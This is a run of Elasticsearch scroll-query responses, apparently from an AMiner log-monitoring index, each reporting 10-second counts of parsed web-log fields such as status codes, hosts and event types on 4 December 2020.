{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"RzPuLXYBIkOurnXXeoh6","_score":1.0,"_source":{"FromTime":1.607088362206958E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":13,"/parser/model/type_str":2781,"/parser/model/php":0,"/parser/model/status_code":6,"/parser/model/host":5,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:12.243Z","ToTime":1.607088372207032E9,"fromtimestamp":"2020-12-04T13:26:02.206Z","totimestamp":"2020-12-04T13:26:12.207Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"TTPuLXYBIkOurnXXoojy","_score":1.0,"_source":{"FromTime":1.607088372563724E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":27,"/parser/model/type_str":2015,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:22.602Z","ToTime":1.607088382563822E9,"fromtimestamp":"2020-12-04T13:26:12.563Z","totimestamp":"2020-12-04T13:26:22.563Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"UTPuLXYBIkOurnXXyoiq","_score":1.0,"_source":{"FromTime":1.607088382723041E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":19,"/parser/model/type_str":618,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:32.771Z","ToTime":1.607088392723119E9,"fromtimestamp":"2020-12-04T13:26:22.723Z","totimestamp":"2020-12-04T13:26:32.723Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"VTPuLXYBIkOurnXX8Yjy","_score":1.0,"_source":{"FromTime":1.607088392788693E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":4,"/parser/model/type_str":151,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:42.826Z","ToTime":1.607088402788764E9,"fromtimestamp":"2020-12-04T13:26:32.788Z","totimestamp":"2020-12-04T13:26:42.788Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"WzPvLXYBIkOurnXXGYho","_score":1.0,"_source":{"FromTime":1.607088402876697E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":319,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:52.928Z","ToTime":1.607088412876761E9,"fromtimestamp":"2020-12-04T13:26:42.876Z","totimestamp":"2020-12-04T13:26:52.876Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"YDPvLXYBIkOurnXXQYhb","_score":1.0,"_source":{"FromTime":1.607088413096821E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":1141,"/parser/model/php":0,"/parser/model/status_code":4,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:03.155Z","ToTime":1.607088423096905E9,"fromtimestamp":"2020-12-04T13:26:53.096Z","totimestamp":"2020-12-04T13:27:03.096Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ZTPvLXYBIkOurnXXaYhw","_score":1.0,"_source":{"FromTime":1.607088423360947E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":27,"/parser/model/type_str":1073,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:13.417Z","ToTime":1.607088433361018E9,"fromtimestamp":"2020-12-04T13:27:03.360Z","totimestamp":"2020-12-04T13:27:13.361Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ajPvLXYBIkOurnXXkYhn","_score":1.0,"_source":{"FromTime":1.607088433607134E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":19,"/parser/model/type_str":988,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:23.648Z","ToTime":1.607088443607235E9,"fromtimestamp":"2020-12-04T13:27:13.607Z","totimestamp":"2020-12-04T13:27:23.607Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"bzPvLXYBIkOurnXXuojy","_score":1.0,"_source":{"FromTime":1.607088444216048E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":14,"/parser/model/type_str":3588,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:34.283Z","ToTime":1.607088454216143E9,"fromtimestamp":"2020-12-04T13:27:24.216Z","totimestamp":"2020-12-04T13:27:34.216Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"czPvLXYBIkOurnXX4ogb","_score":1.0,"_source":{"FromTime":1.607088454263898E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":103,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:44.308Z","ToTime":1.607088464264148E9,"fromtimestamp":"2020-12-04T13:27:34.263Z","totimestamp":"2020-12-04T13:27:44.264Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"eDPwLXYBIkOurnXXDIhj","_score":1.0,"_source":{"FromTime":1.607088465094996E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":26,"/parser/model/type_str":4659,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:55.132Z","ToTime":1.607088475095059E9,"fromtimestamp":"2020-12-04T13:27:45.094Z","totimestamp":"2020-12-04T13:27:55.095Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"fjPwLXYBIkOurnXXM4jZ","_score":1.0,"_source":{"FromTime":1.607088475178856E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":275,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:05.234Z","ToTime":1.607088485178946E9,"fromtimestamp":"2020-12-04T13:27:55.178Z","totimestamp":"2020-12-04T13:28:05.178Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"gjPwLXYBIkOurnXXW4ic","_score":1.0,"_source":{"FromTime":1.607088485375105E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":8,"/parser/model/type_str":1029,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:15.413Z","ToTime":1.607088495375182E9,"fromtimestamp":"2020-12-04T13:28:05.375Z","totimestamp":"2020-12-04T13:28:15.375Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"iDPwLXYBIkOurnXXg4jt","_score":1.0,"_source":{"FromTime":1.607088495696157E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":17,"/parser/model/type_str":1714,"/parser/model/php":0,"/parser/model/status_code":4,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:25.734Z","ToTime":1.607088505696266E9,"fromtimestamp":"2020-12-04T13:28:15.696Z","totimestamp":"2020-12-04T13:28:25.696Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"jDPwLXYBIkOurnXXrIho","_score":1.0,"_source":{"FromTime":1.607088506059213E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":2004,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:36.097Z","ToTime":1.607088516059322E9,"fromtimestamp":"2020-12-04T13:28:26.059Z","totimestamp":"2020-12-04T13:28:36.059Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"kDPwLXYBIkOurnXX04iY","_score":1.0,"_source":{"FromTime":1.607088516083463E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:46.128Z","ToTime":1.607088526083539E9,"fromtimestamp":"2020-12-04T13:28:36.083Z","totimestamp":"2020-12-04T13:28:46.083Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ljPwLXYBIkOurnXX-4gg","_score":1.0,"_source":{"FromTime":1.607088526182068E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":4,"/parser/model/type_str":399,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:56.248Z","ToTime":1.607088536182151E9,"fromtimestamp":"2020-12-04T13:28:46.182Z","totimestamp":"2020-12-04T13:28:56.182Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"mzPxLXYBIkOurnXXJIjl","_score":1.0,"_source":{"FromTime":1.60708853690535E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":12,"/parser/model/type_str":3908,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:06.942Z","ToTime":1.607088546905412E9,"fromtimestamp":"2020-12-04T13:28:56.905Z","totimestamp":"2020-12-04T13:29:06.905Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"oDPxLXYBIkOurnXXTYjD","_score":1.0,"_source":{"FromTime":1.607088547363252E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":9,"/parser/model/type_str":2612,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:17.404Z","ToTime":1.60708855736333E9,"fromtimestamp":"2020-12-04T13:29:07.363Z","totimestamp":"2020-12-04T13:29:17.363Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"pTPxLXYBIkOurnXXdYjw","_score":1.0,"_source":{"FromTime":1.607088557644684E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":18,"/parser/model/type_str":1351,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:27.689Z","ToTime":1.607088567644748E9,"fromtimestamp":"2020-12-04T13:29:17.644Z","totimestamp":"2020-12-04T13:29:27.644Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"qjPxLXYBIkOurnXXnYh6","_score":1.0,"_source":{"FromTime":1.607088567768974E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":450,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:37.811Z","ToTime":1.607088577769054E9,"fromtimestamp":"2020-12-04T13:29:27.768Z","totimestamp":"2020-12-04T13:29:37.769Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"rjPxLXYBIkOurnXXxog0","_score":1.0,"_source":{"FromTime":1.607088578197576E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":14,"/parser/model/type_str":1876,"/parser/model/php":0,"/parser/model/status_code":13,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:48.237Z","ToTime":1.607088588197668E9,"fromtimestamp":"2020-12-04T13:29:38.197Z","totimestamp":"2020-12-04T13:29:48.197Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"tDPxLXYBIkOurnXX7Yjs","_score":1.0,"_source":{"FromTime":1.607088588366563E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":20,"/parser/model/type_str":750,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:58.405Z","ToTime":1.607088598366688E9,"fromtimestamp":"2020-12-04T13:29:48.366Z","totimestamp":"2020-12-04T13:29:58.366Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"uTPyLXYBIkOurnXXFogk","_score":1.0,"_source":{"FromTime":1.607088598649987E9,"StatusInfo":{"/parser/model/classification":1,"/parser/model/event_type_str":18,"/parser/model/type_str":1400,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:08.701Z","ToTime":1.607088608650065E9,"fromtimestamp":"2020-12-04T13:29:58.649Z","totimestamp":"2020-12-04T13:30:08.650Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"vTPyLXYBIkOurnXXPoh2","_score":1.0,"_source":{"FromTime":1.607088608978295E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":87,"/parser/model/type_str":7140,"/parser/model/php":0,"/parser/model/status_code":36,"/parser/model/host":6,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:19.023Z","ToTime":1.60708861897837E9,"fromtimestamp":"2020-12-04T13:30:08.978Z","totimestamp":"2020-12-04T13:30:18.978Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"wzPyLXYBIkOurnXXZohS","_score":1.0,"_source":{"FromTime":1.607088619188115E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":18,"/parser/model/type_str":948,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:29.226Z","ToTime":1.607088629188182E9,"fromtimestamp":"2020-12-04T13:30:19.188Z","totimestamp":"2020-12-04T13:30:29.188Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"xzPyLXYBIkOurnXXj4j4","_score":1.0,"_source":{"FromTime":1.607088629851852E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":33,"/parser/model/type_str":3427,"/parser/model/php":0,"/parser/model/status_code":7,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:39.889Z","ToTime":1.607088639851962E9,"fromtimestamp":"2020-12-04T13:30:29.851Z","totimestamp":"2020-12-04T13:30:39.851Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"zDPyLXYBIkOurnXXuIjH","_score":1.0,"_source":{"FromTime":1.607088640299281E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":10,"/parser/model/type_str":2606,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:50.336Z","ToTime":1.607088650299357E9,"fromtimestamp":"2020-12-04T13:30:40.299Z","totimestamp":"2020-12-04T13:30:50.299Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"0TPyLXYBIkOurnXX4Iip","_score":1.0,"_source":{"FromTime":1.607088650508702E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":1037,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:00.546Z","ToTime":1.607088660508778E9,"fromtimestamp":"2020-12-04T13:30:50.508Z","totimestamp":"2020-12-04T13:31:00.508Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"1zPzLXYBIkOurnXXCIiC","_score":1.0,"_source":{"FromTime":1.607088660705171E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":16,"/parser/model/type_str":918,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:10.746Z","ToTime":1.607088670705239E9,"fromtimestamp":"2020-12-04T13:31:00.705Z","totimestamp":"2020-12-04T13:31:10.705Z","version":"1"}}]}} 